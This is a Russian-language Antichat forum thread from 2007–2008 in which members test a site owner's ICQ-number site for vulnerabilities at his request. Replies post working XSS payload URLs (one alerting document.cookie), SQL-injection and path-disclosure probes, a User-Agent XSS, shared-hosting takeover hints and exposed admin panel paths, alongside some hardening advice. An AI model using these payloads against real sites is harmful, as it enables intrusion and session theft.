Форум АНТИЧАТ - Проверьте besticq плз

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Проверка на уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=110)

- - Проверьте besticq плз (https://forum.antichat.xyz/showthread.php?t=54963)

Ridikh

03.12.2007 20:28

Проверьте плз

Собсно сабж ;)

biophreak

04.12.2007 13:08

Проверяй строку браузера на корректность в гостевухе...
И проверочный код - нафиг он вообще там...юзай капчу ))))

groundhog

04.12.2007 13:19

http://besticq.ru/gb/index.php?act=sendmail&to=%22%3E%3Cfont%20style=co lor:red;font-size:200pt;%20%3E%CA%F0%E5%E2%E5%E4!%3C/font%3E&for=sadsad

Elvis000

04.12.2007 16:27

раскрытие пути + sql-inj

http://besticq.ru/forum_wap/index.php?id_forum=2&id_razd=12&id_them=521312752& page='

Underwit

04.12.2007 16:43

Я вам там чуть гостевуху запарол. Кароч если поменять user-agent браузера на код

Цитата:

то можно добиться xss, но проблема в том что выводиться не всё, часть символов режиться. Вот. Кароч в гостевухе больше ничо не видно. Извините.

halkfild

04.12.2007 17:09

[раскрытие]
http://besticq.ru/forum_wap/new.php?page=end'

з.ы. мдя с гостевой конечно не сильно хорошо =\
з.з.ы. смотрю дальше

Underwit

05.12.2007 16:29

Цитата:

Сообщение от Ridikh

шел например реально залить?
или через другой сайт на хостинге залесть?

через другой сайт реально залесть. По reverse-ip 143 штуки показал.

Underwit

06.12.2007 02:26

Цитата:

Сообщение от Ridikh

как защитить можно?

halkfild: никак... смотри за своей безопасностю
з.ы. купи выделенный сервер и размести там свой сайт

Почему никак?
Можно если будут правильно выставлены права.
Или купить у хостера отдельный ip.

RenGen

09.12.2007 19:59

Код:

http://besticq.ru/sms/buy.php?uin=9971898&s_language='

RenGen

09.12.2007 20:03

Код:

http://besticq.ru/sms/buy.php?uin=9971898&s_country=%22%3E%3C/title%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

gormet

14.12.2007 18:14

Цитата:

Warning: implode() [function.implode]: Bad arguments. in /home/d000000155/domains/besticq.ru/public_html/sms/buy.php on line 9
503 Service Temporarily Unavailable in /home/d000000155/domains/besticq.ru/public_html/sms/buy.php on line 9

Смени хостера :) и где продажа 6 знаков? 404 говорит

[aywo]

14.12.2007 18:29

еще 1 xss)

Код:

http://besticq.ru/sms/buy.php?uin=4393348&s_pair=%5C%5C%5C%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%28alert%29%3B%3C%2Fscript%3E

Sn@k3

15.12.2007 16:25

Цитата:

Сообщение от Ridikh

шел например реально залить?

ну так для начала фильтруй кавычку, если есть в параметре пускай переходит на главную =\
имея скуль залить шелл можно при определенных условиях

Sn@k3

15.12.2007 16:27

Цитата:

Сообщение от Ridikh

что тут такого?

Error_Reporting(E_ALL & ~E_NOTICE); //добавь в скрипт

S(r1pt

19.01.2008 10:58

Ridikh просто когда даешь сайт на тест, надо убирать всевозможно важную тебе инфу =)
А вообще тебе баги выше описали (и сейчас ищут ещё)

lsass.exe

20.01.2008 14:13

Цитата:

Сообщение от Ridikh

гостевую снесли, теперь попробуйте сломать

то что вы убрали гостевую никак не повлияло на все остальное ;)

helat

09.02.2008 00:01

admin000/language.php ваша админка)))
mod001/user.php ваша модерка))))

всё тута http://forum.besticq.ru

Ali_MiX

09.02.2008 00:05

Цитата:

Сообщение от helat

admin000/language.php ваша админка)))
mod001/user.php ваша модерка))))

всё тута http://forum.besticq.ru

хочешь сказать что там форум дырявый ?

Время: 06:33